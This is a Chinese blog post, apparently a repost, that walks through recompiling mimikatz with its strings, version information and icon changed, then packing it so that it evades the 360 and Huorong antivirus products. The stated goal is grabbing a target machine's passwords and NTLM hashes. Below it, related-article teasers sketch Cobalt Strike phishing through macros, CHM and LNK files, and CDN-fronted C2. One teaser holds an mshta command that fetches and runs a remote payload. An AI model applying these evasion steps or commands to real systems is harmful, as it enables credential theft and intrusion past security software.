mimikatz免杀过360和火绒

mimikatz

mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查杀的几率极高。

1、免杀方式

对mimikatz我们进行源码免杀。源码免杀只需要定位源码中的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。

2、免杀处理

我们访问https://github.com/gentilkiwi/mimikatz 下载源码
我们用vs2012打开源码进行免杀处理
在这里插入图片描述
编译源码,这里注意编译源码可能会报错(V110),我们需要去要编译对象的属性里
在这里插入图片描述
该成这样,再选择C/C++
在这里插入图片描述
改成这样,我们这里需要生成一个x64的执行文件,所以去改一下
在这里插入图片描述
解决方案属性将mimikatz改为x64,生成exe
在这里插入图片描述
成功在这里插入图片描述
我们点击执行一下
在这里插入图片描述
可以看到此时360是对mimikatz查杀的
我们使用第一种发放,将项目内的所有的mimikatz字符替换,点击编辑、查找替换、在文件中查找,
在这里插入图片描述
全部替换
在这里插入图片描述
我们看到此时代码中的mimikatz已经被全部替换为test,还不够,我们还要将我们的文件名全改为test
在这里插入图片描述
我们重新生成一下
生成之后执行
在这里插入图片描述
还是查杀。再次细致一点,我们把mimikatz项目文件内的注册信息全部删除掉,版本信息删掉
在这里插入图片描述
这个删除掉,点击test.rc:

在这里插入图片描述
把版本信息删除,可以在把图标改了(写的时候虚拟机宕机了,擦)
在这里插入图片描述
新生成的新图标mimikatz执行成功了(这里又加了一步,把生成的exe的ico换掉了),这样是免杀的,但是可能就持续几分钟吧,360就杀掉了。这个也是无法通过火绒的。我们用上节课说到的掩日3.0工具,将mimikatz.exe拖入客户端等待10秒就OK。可以过火绒,但是过不了360
在这里插入图片描述
我们可以看到火绒是过了的

3、总结

其实像mimikatz这种人见人打的工具做免杀还是很辛苦的,做的几个免杀exe其实几分钟之后就被杀掉了,但是这也是一种方式,我们可以再有限的时间内拿到目标机器的密码或者NTLM密文。360还是挺强的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/358245.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SVN:请求不到主机,应该如何解决?

连了公司的局域网,可能一个账号人多的缘故,给你们讲一下思路。确保一点在同一个局域网。 然后ping一下域名。也是不通的 把域名换成IP进行访问试试,这个检查一下路径没有问题即可。

Redis漏洞利用的4种方法

Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remov…

系统已有MYSQL环境,如何安装宝塔面板

最近一直想搞一个在线博客网站,把代码部署到服务器。 下载己经下载了宝塔的.exe文件,安装提示系统已经存在MYSQL环境,请用纯净系统安装。 因为我以前做java的,已经装了,现在把它卸载即可。 WINR打开注册表输入regedit。 删除HK…

宝塔命令号操作全-最实用的莫过于修改密码啦

连续输入五次密码错误,只能CMD进行操作啦。看上图。

swaks使用教程

Swaks基本用法: 1、swaks --to testqq.com 测试邮箱的连通性; 2、参数说明(这里只是简单的罗列了一些,至于更加具体的内容可以使用–help进行查看了解): --from testqq.com //发件人邮箱&#xff1…

电脑win7支持的node.js版本

从官网看了都是最新的版本,我这电脑是win7的,最新版支持最低版本win8.1. 只能找一个支持win7、的node版本。 官网:https://nodejs.org/en/download/ 历史版本:https://nodejs.org/en/download/releases/ 建议打开图标下载,打开链接下载速度特别慢。 下载完成后直接傻瓜式安…

Office-DOC加载宏-上线CS

原理 将直接加载远程带有宏的恶意模版使用。 缺点 目标主机的网速决定了加载远程模版的速度。有可能文件打开的会特别慢(例如将远程模版放在github),受害者可能在文件打开一半的时候强制关闭word。优点 因为是远程加载,所以免杀效果十分不错。基本不会…

电子书-CHM-上线CS

电子书-CHM-加载JS&PS-上线CS 1.对CS进行设置 服务端配置CS-客户端打开-攻击-钓鱼攻击-脚本web传递-配置选择监听器-设置端口-选择类型为power shell-点击开始-复制生成的利用代码 2.对当前.CHM电子书进行解压 进入文件后选择任意文件夹进入 3.这里演示:进入…

发布单机端DELPHI程序访问MySQL必备文件

如图: 将你的DELPHI程序和midas.dlllibmysql.dllDbxmys.dll 放在同一目录下即可.转载于:https://www.cnblogs.com/smartlittleant/p/4838327.html

java java se_Java SE 7、8、9 –推动Java前进

java java se今天(注:2011年10月4日)是主题演讲日。 JavaOne Keynote将于今早从上午8:30到10:30进行,而我的新闻通行证又一次让我很早就参加了。 因此,我有时间在所有关键球员准备就绪并可能感到紧张的同时为其拍摄一些…

利用快捷方式-LNK-上线CS

步骤: 1、生成:Attacks -> Packages -> Html Application 2、上传:Attacks——>Web Drive by——>Host file 3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext 4、伪装: -创建快捷方式 -生成HTA并…

基本算法研究1-冒泡排序算法测试

基本算法研究1-冒泡排序算法测试 1、经典冒泡排序法基本原理 先看一个动态图,感觉比较形象: 冒泡排序(Bubble Sort)是一种简单的排序算法。默认是从小到大排序,即把最大的数据排在最后,相当于每次把最大数据…

CS-证书指纹修改

cobaltstrike.store是cobalt strike的证书文件,CS是java编写的,修改证书需要Java环境,搜索keytool,把证书复制到该目录进行操作,需要cmd以管理员权限才能生成成功。 证书默认密码:123456 查看证书指纹: key…

Java中的低延迟FIX引擎

总览 Chronicle FIX是我们的Low Latency FIX引擎和Java数据库。 是什么使它与众不同? 是为Java中的超低GC *设计的。 支持字符串和日期时间的方式可以最大程度地减少垃圾和开销。 可自定义为仅包含您期望的字段。 使用通常在二进制解析器和生成器中使用的优化&…

钓鱼文件名反转office远程模板

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关 0x01 件…

Cobalt Strike特征修改

在红蓝对抗以及hvv等等情况下,我们都会用到 Cobalt Strike,那么它也是安全公司重点关注的对象,跟msf类似,但CS操作相对比MSF使用简单,同时也有一个强大的插件库。那么,这么红的工具,特征方面安全…

工厂模式与抽象工厂模式

1、工厂模式:定义了一组创建对象的接口,但是由子类决定要实例化的类是哪一个。工厂方法把类的实例化推迟到子类中。 现在考虑有PizzaStore有一些子类(加盟店),他们有可能对pizza的做法进行一些改良,即creat…

数据类型转换为false的有哪些?

看图,看选项你就明白啦

CS通过(CDN+证书)powershell上线详细版

0x00 简介 这个应该叫做域前置技术: 大致图示: 攻击流量通过CDN节点将流量转发到真实的C2服务器CDN节点ip通过识别请求的Host头进行流量转可以有效的躲避一些安全设备,也有这一定的反溯源功能,因为流量都去了CDN上 之前看了一些…

红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)

本篇文章转载于:https://blog.csdn.net/q20010619/article/details/122006433?utm_mediumdistribute.pc_relevant.none-task-blog-2defaultbaidujs_utm_term~default-1-122006433-blog-122810834.pc_relevant_default&spm1001.2101.3001.4242.2&utm_relevant_index4 文…